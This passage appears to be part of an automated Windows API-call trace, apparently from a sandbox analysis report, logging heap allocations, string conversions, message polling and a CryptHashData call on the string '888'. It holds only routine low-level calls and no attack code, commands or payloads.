[0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0259.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.641] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550e8 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0259.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0259.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0259.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0259.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55088, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550d8 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.644] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0259.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.644] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0259.645] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0259.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51cb8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0259.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.646] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0259.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.646] CryptHashData (hHash=0xa87290, pbData=0x2e550e8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0259.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0259.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51df0 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0259.647] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0259.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.648] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0259.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51dc0 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0259.648] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0259.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0259.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0259.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0259.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0259.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0259.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0259.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.650] HeapFree 